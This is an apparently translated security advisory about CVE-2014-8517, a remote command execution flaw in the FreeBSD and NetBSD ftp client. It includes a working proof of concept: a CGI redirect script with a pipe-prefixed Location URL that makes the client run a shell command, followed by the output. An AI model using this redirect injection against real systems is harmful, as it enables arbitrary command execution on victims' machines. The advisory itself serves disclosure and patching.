“CVE-2014-8517” vulnerability: Remote command execution in FreeBSD

FreeBSD developers have published a notification of elimination of vulnerability in FreeBSD.

Operation of vulnerability allows to execute arbitrary commands, provides access to critical information and locks the computer. A malicious HTTP server could cause ftp to execute arbitrary commands.

Danger level: High

Availability fixes: Yes

Number of vulnerabilities: 1

CVSSv2 Rating: (AV: N / AC: M / Au: N / C: C / I: C / A: C / E: U / RL: O / RC: C) = Base: 9.3 / Temporal: 6.9

CVE ID: CVE-2014-8517

Vector of operation: Remote

Impact: Remote command execution

Affected Products: FreeBSD 9.x, FreeBSD 10.x

Affected versions: FreeBSD 9.x (all supported versions), FreeBSD 10.x (all supported versions)

Description:

[CVE-2014-8517] – a dangerous vulnerability in FTP-client, which allows the attacker to use a utility ftp.exe interactively and execute arbitrary commands on the victim’s computer.

The vulnerability is due to an error in the function “fetch_url ()” in the script /src/usr.bin/ftp/fetch.c when processing URL. A remote user can execute arbitrary code on the target system.

The technique of the attack:

a20 $ pwd

/ var / www / cgi-bin

a20 $ ls -l

total 4

-rwxr-xr-x 1 root wheel 159 Oct 14 02:02 redirect

-rwxr-xr-x 1 root wheel 178 Oct 14 01:54 | uname -a

a20 $ cat redirect

#! / bin / sh

echo 'Status: 302 Found'

echo 'Content-Type: text / html'

echo 'Connection: keep-alive'

echo 'Location: http: // 192.168.2.19 / cgi-bin /|uname%20-a'

echo

a20 $

a20 $ ftp http: // localhost / cgi-bin / redirect

Trying :: 1: 80 ...

ftp: Can not connect to `:: 1: 80 ': Connection refused

Trying 127.0.0.1:80 ...

Requesting http: // localhost / cgi-bin / redirect

Redirected to http: // 192.168.2.19 / cgi-bin/ |uname%20-a

Requesting http:// 192.168.2.19 / cgi-bin / |uname%20-a

32 101.46 KiB / s

32 bytes retrieved in 00:00 (78.51 KiB / s)

NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) # 113: Sun Oct 26 12:05:36

ADT 2014

Jared @ Jared-PC: / cygdrive / d / netbsd / src / sys / arch / evbarm / compile / obj / CUBIE

BOARD evbarm

a20 $

A vulnerability found in all current versions of FreeBSD. A similar problem persists in the NetBSD ftp client, and possibly present in other BSD-systems.

Solution: Install the update from the manufacturer.

References:

https://lists.freebsd.org/pipermail/freebsd-announce/2014-November/001601.html

Manufacturer URL: http://www.freebsd.org/